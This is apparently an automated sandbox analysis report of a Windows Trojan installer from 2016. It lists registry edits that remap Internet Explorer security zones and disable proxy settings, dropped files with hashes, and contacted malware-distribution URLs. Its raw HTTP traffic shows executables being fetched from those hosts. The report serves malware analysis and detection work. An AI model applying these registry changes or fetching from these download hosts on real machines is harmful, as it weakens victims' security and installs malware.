The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
fb33b9c5234606a7dbf9247e01e8f86a c:\Documents and Settings\"%CurrentUserName%"\Application Data\InstallW\Full_Setup.exe
67c42aeb90801b8b63596be833f409b3 c:\Documents and Settings\"%CurrentUserName%"\Application Data\InstallW\Uninstall.exe
122ae907c9811b0779165a7030449eb2 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\Uninstall.exe
542199ec8faa7cb170b8f663d62ada99 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\F8F04D56-1461948934-9F9E-2793-BE0B0302CDFB\qnse20.tmp
2a5f246b97d00f77b78d15f72923839b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Uninstall.exe
bb25f5faf1d2329cbad8b763695bc518 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsa22.tmp
a3ed6f7ea493b9644125d494fbf9a1e6 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nse3.tmp\IpConfig.dll
8531346d16fa5d4768f6530d2eb2b65c c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nse3.tmp\WmiInspector.dll
f02155fa3e59a8fc48a74a236b2bb42e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nse3.tmp\inetc.dll
058ba8a0916d957d3b91d08ea2e876e2 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nse3.tmp\t1.dll
f02155fa3e59a8fc48a74a236b2bb42e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf10.tmp\inetc.dll
8501f079ef3fc63721d0164b8a34b4a9 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsoA.tmp
3fdbfc57c03c91b672af530efe849cb3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\zEuCD[1]
2a5f246b97d00f77b78d15f72923839b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\Validate[1].exe
fb33b9c5234606a7dbf9247e01e8f86a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\CAW5CX8N.htm
bb25f5faf1d2329cbad8b763695bc518 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\KrMubhB0c[1]

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: setup
Product Version: 1.0.0.0
Legal Copyright: Copyright 2013
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description:
Comments:
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23462 23552 4.51398 9d64b6ac6eb1aa41e38f6cc8798b652e
.rdata 28672 4496 4608 3.59163 f179218a059068529bdb4637ef5fa28e
.data 36864 3774424 1024 3.26654 af685ae5a632e08acd6c90a62cdfc3bb
.ndata 3813376 73728 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 3887104 17192 17408 4.11146 9744c9d8118bab5893d7e4c284c0adee

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 843
9e690e54fcaaec9e5ab149fdc7b39849
42c7df5771aed3248e8f04ac2affda17
65a8ed347f955dc5b0cc72cd41edbda0
0474bc4cdbf6ebb28c41f29f08aff838
56f0773f477f9cd0340c0be299733fec
7d55f8587b19fc4f736b5142fafbf7d4
5ce92582e1a08a0ff321f9340e1050e4
94eefef5bbfc51c6b58cdd78d4d23a60
7360f94503b83a0a7583e4dd3b1a5da7
cead8cb9974398d8a97f11ecadffa99d
5c970638dc1d11b78456803966700f51
32781edd5bd0b472be7f9f3e7b066c17
680a542ac63edbf9b931b5db42883fb1
465c622d673d1c58e5bf257e4474113d
86772153d906b98a65d9a64a910117f6
13ddb0d6ec6ed13888cf211634187f29
00a69d79ba73b543914470b9087a11e8
4f2b2e2301f662eb0c2ef92d267711d2
8bf2fb9cdba8e11b9c67885900eb82d6
67df116b398f91b64eeab7c6fc280bb7
6f377cd73cbf924b48ba52c335a47c78
d4db355aaebca07562d248ae8b8c5635
2ef26b587dab0f74352943849596f24e
150711d4ed93d249436d8e851a9698e7
38aef307050ce93a00fd647bc1b34ef0

URLs

URL IP
hxxp://data.biphysics.com/r?_=1461938128334&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLU56WmtNRjgwTkY4eE5EWXlYekUwT0RGZlIwSmZPREl1TkRFdU5qUXVORjgxTXpCZk1qZzJNVjlCUkZNLV8tTHFPUHRtYmZzd3R6RHdHSms5YUNvYUZvYkdmYV9GOGFENWFrLVZfX0otYmFCZGJ2SU9ZTU1qS0hxdGFhZzBBSnJKZEswdXQ5T3JrdEJHcTFnYTVIZGlucXlhclEwT01tcUpkMGRiZDFLamQwSmpQazdtQTVlbmJwQlJ4a1FsMllhbkZSLXdJMjZWV1BwVUo3anJFNkVLSGVXbmlOUGVyY3JjcWNfaVJQckl3VGFuS0J1em13S0Frd1hyLVRhMzltQUNPd3dJY0RHMGxpbk1ha0wyTm5kZWp0bGp3d18tb2RzVmx6ZlQyQUp5eU01anJza25qZExrWUt6YmNlcFN3VG45OWpVTkJGT210T25UbmVVbmxwRlJ6MC1LR3puY3UxZUM3Z2p4QVA5c0NLRFlZMkVGWlJDOWl1aHhSVWdDOFBVdFRhb2tpaklEQ0wwbE1jNGhEVWEwSlFEbjQ1S2tzeUc4Z0ljbnFNT0M5cjUxTGlXbDhnQkpJYmtUSk5WUWUzaWRIZFh5SHF5a09mblVnMTJ0MGxlTkNweW9BY0VJTGZjUW9xaTB0RF92TlVmX2ozb2ZjZjJxZG9QMFd9fQ==&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB 52.72.165.251
hxxp://data.biphysics.com/r/?_=1461938128334&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLU56WmtNRjgwTkY4eE5EWXlYekUwT0RGZlIwSmZPREl1TkRFdU5qUXVORjgxTXpCZk1qZzJNVjlCUkZNLV8tTHFPUHRtYmZzd3R6RHdHSms5YUNvYUZvYkdmYV9GOGFENWFrLVZfX0otYmFCZGJ2SU9ZTU1qS0hxdGFhZzBBSnJKZEswdXQ5T3JrdEJHcTFnYTVIZGlucXlhclEwT01tcUpkMGRiZDFLamQwSmpQazdtQTVlbmJwQlJ4a1FsMllhbkZSLXdJMjZWV1BwVUo3anJFNkVLSGVXbmlOUGVyY3JjcWNfaVJQckl3VGFuS0J1em13S0Frd1hyLVRhMzltQUNPd3dJY0RHMGxpbk1ha0wyTm5kZWp0bGp3d18tb2RzVmx6ZlQyQUp5eU01anJza25qZExrWUt6YmNlcFN3VG45OWpVTkJGT210T25UbmVVbmxwRlJ6MC1LR3puY3UxZUM3Z2p4QVA5c0NLRFlZMkVGWlJDOWl1aHhSVWdDOFBVdFRhb2tpaklEQ0wwbE1jNGhEVWEwSlFEbjQ1S2tzeUc4Z0ljbnFNT0M5cjUxTGlXbDhnQkpJYmtUSk5WUWUzaWRIZFh5SHF5a09mblVnMTJ0MGxlTkNweW9BY0VJTGZjUW9xaTB0RF92TlVmX2ozb2ZjZjJxZG9QMFd9fQ==&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB 52.72.165.251
hxxp://data.biphysics.com/r?_=1461938130318&pid=10732314-17&evt=IW:c1&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB 52.72.165.251
hxxp://data.biphysics.com/r/?_=1461938130318&pid=10732314-17&evt=IW:c1&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB 52.72.165.251
hxxp://www.download-servers.com/vuupc/dl.php?rr=APc1&sct=AGR&data=null&r=ap_100_nc&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLU56WmtNRjgwTkY4eE5EWXlYekUwT0RGZlIwSmZPREl1TkRFdU5qUXVORjgxTXpCZk1qZzJNVjlCUkZNLV8tTHFPUHRtYmZzd3R6RHdHSms5YUNvYUZvYkdmYV9GOGFENWFrLVZfX0otYmFCZGJ2SU9ZTU1qS0hxdGFhZzBBSnJKZEswdXQ5T3JrdEJHcTFnYTVIZGlucXlhclEwT01tcUpkMGRiZDFLamQwSmpQazdtQTVlbmJwQlJ4a1FsMllhbkZSLXdJMjZWV1BwVUo3anJFNkVLSGVXbmlOUGVyY3JjcWNfaVJQckl3VGFuS0J1em13S0Frd1hyLVRhMzltQUNPd3dJY0RHMGxpbk1ha0wyTm5kZWp0bGp3d18tb2RzVmx6ZlQyQUp5eU01anJza25qZExrWUt6YmNlcFN3VG45OWpVTkJGT210T25UbmVVbmxwRlJ6MC1LR3puY3UxZUM3Z2p4QVA5c0NLRFlZMkVGWlJDOWl1aHhSVWdDOFBVdFRhb2tpaklEQ0wwbE1jNGhEVWEwSlFEbjQ1S2tzeUc4Z0ljbnFNT0M5cjUxTGlXbDhnQkpJYmtUSk5WUWUzaWRIZFh5SHF5a09mblVnMTJ0MGxlTkNweW9BY0VJTGZjUW9xaTB0RF92TlVmX2ozb2ZjZjJxZG9QMFd9fQ== 95.211.210.34
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ 54.235.253.3
hxxp://www.download-servers.com/SysInfo/Validate.exe 95.211.210.34
hxxp://sstatic1.histats.com/0.gif?2601800&101 208.43.241.178
hxxp://www.download-servers.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= 95.211.210.34
hxxp://www.download-servers.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= 95.211.210.34
hxxp://sstatic1.histats.com/0.gif?2601768&101 208.43.241.178
hxxp://www.download-servers.com/SysInfo/countup.php?sid=554655542 95.211.210.34
hxxp://sstatic1.histats.com/0.gif?2601603&101 208.43.241.178
hxxp://data.biphysics.com/r?_=1461938133850&pid=10732314-17&evt=IW:dlc&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB 52.72.165.251
hxxp://data.biphysics.com/r/?_=1461938133850&pid=10732314-17&evt=IW:dlc&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB 52.72.165.251
hxxp://www.download-servers.com/SysInfo/tem.php?sid=83837567483 95.211.210.34
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= 95.211.210.34
hxxp://download-servers.com/SysInfo/Validate.exe 95.211.189.16
hxxp://mobilitydata5.com/SysInfo/countup.php?sid=554655542 95.211.189.16
hxxp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483 95.211.189.16
hxxp://livestatscounter.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= 95.211.210.34


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET MALWARE Possible Windows executable sent when remote host claims to send html content

Traffic

GET /0.gif?2601768&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CountUid=5c27ba5e-d1jg-4b75-bd1b-bdc7b11d8566


HTTP/1.1 200 OK
Date: Fri, 29 Apr 2016 13:55:58 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
GIF89a.............!.......,...........D..;..



GET /vuupc/dl.php?rr=APc1&sct=AGR&data=null&r=ap_100_nc&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLU56WmtNRjgwTkY4eE5EWXlYekUwT0RGZlIwSmZPREl1TkRFdU5qUXVORjgxTXpCZk1qZzJNVjlCUkZNLV8tTHFPUHRtYmZzd3R6RHdHSms5YUNvYUZvYkdmYV9GOGFENWFrLVZfX0otYmFCZGJ2SU9ZTU1qS0hxdGFhZzBBSnJKZEswdXQ5T3JrdEJHcTFnYTVIZGlucXlhclEwT01tcUpkMGRiZDFLamQwSmpQazdtQTVlbmJwQlJ4a1FsMllhbkZSLXdJMjZWV1BwVUo3anJFNkVLSGVXbmlOUGVyY3JjcWNfaVJQckl3VGFuS0J1em13S0Frd1hyLVRhMzltQUNPd3dJY0RHMGxpbk1ha0wyTm5kZWp0bGp3d18tb2RzVmx6ZlQyQUp5eU01anJza25qZExrWUt6YmNlcFN3VG45OWpVTkJGT210T25UbmVVbmxwRlJ6MC1LR3puY3UxZUM3Z2p4QVA5c0NLRFlZMkVGWlJDOWl1aHhSVWdDOFBVdFRhb2tpaklEQ0wwbE1jNGhEVWEwSlFEbjQ1S2tzeUc4Z0ljbnFNT0M5cjUxTGlXbDhnQkpJYmtUSk5WUWUzaWRIZFh5SHF5a09mblVnMTJ0MGxlTkNweW9BY0VJTGZjUW9xaTB0RF92TlVmX2ozb2ZjZjJxZG9QMFd9fQ== HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 29 Apr 2016 13:55:55 GMT
Content-Type: text/html
Content-Length: 253819
Connection: keep-alive
X-Powered-By: PHP/5.5.32
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......<...x...x
...x.......z...x...........i...,...t.......y...Richx..................
.PE..L......K.................\....9.....?2.......p....@..............
.............J..............................................s........J
......................................................................
........p...............................text....[.......\.............
..... ..`.rdata.......p.......`..............@[email protected]..........
[email protected]...`...0:..........................rsrc......
...J......v..............@..@.........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
Pr@..}[email protected]... M.......M....3.....FQ.....NU..M..
........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@
..u....E..9}[email protected].}[email protected]
[email protected]@.W...E..E.h [email protected]...\r@._
^3.[.....L$...'z...Si.....VW.T.....tO.q.3.;5.'z.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.'z.r._^[...U..QQ.U.SV..i.
<<< skipped >>>


POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 13:55:57 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 126
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 13:55:57 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Fri, 29 Apr 2016 13:55:57 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 184
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 13:55:59 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Fri, 29 Apr 2016 13:55:59 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 197
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/countup.php?sid=554655542&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 13:56:09 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Fri, 29 Apr 2016 13:56:09 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 182
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 13:56:10 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Fri, 29 Apr 2016 13:56:10 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}..



GET /SysInfo/countup.php?sid=554655542 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: mobilitydata5.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 29 Apr 2016 13:55:58 GMT
Content-Type: application/octet-stream
Content-Length: 549001
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=zEuCD
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......<...x...x
...x.......z...x...........i...,...t.......y...Richx..................
.PE..L......K.................\....9.....?2.......p....@..............
............P|..............................................s.......@|
......................................................................
........p...............................text....[.......\.............
..... ..`.rdata.......p.......`..............@[email protected]..........
[email protected]:..........................rsrc......
..@|......v..............@..@.........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
Pr@..}[email protected]... M.......M....3.....FQ.....NU..M..
........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@
..u....E..9}[email protected].}[email protected]
[email protected]@.W...E..E.h [email protected]...\r@._
^3.[.....L$...'z...Si.....VW.T.....tO.q.3.;5.'z.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.'z.r._^[...U..QQ.U.SV..i.
<<< skipped >>>

GET /SysInfo/tem.php?sid=83837567483 HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: mobilitydata5.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 29 Apr 2016 13:56:10 GMT
Content-Type: application/octet-stream
Content-Length: 80466
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=KrMubhB0c
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................t...z...B...8............@..............
............`&...........@.................................@........@&
......................`...............................................
........................................text....r.......t.............
..... ..`.rdata..n .......,...x..............@[email protected].... ...........
[email protected]......
..@&.....................@[email protected][email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ
<<< skipped >>>


POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4958\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 13:55:56 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4959\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 13:55:56 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4960\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 13:55:56 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4961\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 13:55:56 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Fri, 29 Apr 2016 13:55:56 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}..



GET /0.gif?2601603&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CountUid=5c27ba5e-d1jg-4b75-bd1b-bdc7b11d8566


HTTP/1.1 200 OK
Date: Fri, 29 Apr 2016 13:55:58 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
GIF89a.............!.......,...........D..;..



GET /r?_=1461938128334&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLU56WmtNRjgwTkY4eE5EWXlYekUwT0RGZlIwSmZPREl1TkRFdU5qUXVORjgxTXpCZk1qZzJNVjlCUkZNLV8tTHFPUHRtYmZzd3R6RHdHSms5YUNvYUZvYkdmYV9GOGFENWFrLVZfX0otYmFCZGJ2SU9ZTU1qS0hxdGFhZzBBSnJKZEswdXQ5T3JrdEJHcTFnYTVIZGlucXlhclEwT01tcUpkMGRiZDFLamQwSmpQazdtQTVlbmJwQlJ4a1FsMllhbkZSLXdJMjZWV1BwVUo3anJFNkVLSGVXbmlOUGVyY3JjcWNfaVJQckl3VGFuS0J1em13S0Frd1hyLVRhMzltQUNPd3dJY0RHMGxpbk1ha0wyTm5kZWp0bGp3d18tb2RzVmx6ZlQyQUp5eU01anJza25qZExrWUt6YmNlcFN3VG45OWpVTkJGT210T25UbmVVbmxwRlJ6MC1LR3puY3UxZUM3Z2p4QVA5c0NLRFlZMkVGWlJDOWl1aHhSVWdDOFBVdFRhb2tpaklEQ0wwbE1jNGhEVWEwSlFEbjQ1S2tzeUc4Z0ljbnFNT0M5cjUxTGlXbDhnQkpJYmtUSk5WUWUzaWRIZFh5SHF5a09mblVnMTJ0MGxlTkNweW9BY0VJTGZjUW9xaTB0RF92TlVmX2ozb2ZjZjJxZG9QMFd9fQ==&v=F8F04D56-B792-9F9E-2793-BE0B0302CDFB HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 13:55:54 GMT
Content-Type: text/html
Content-Length: 184
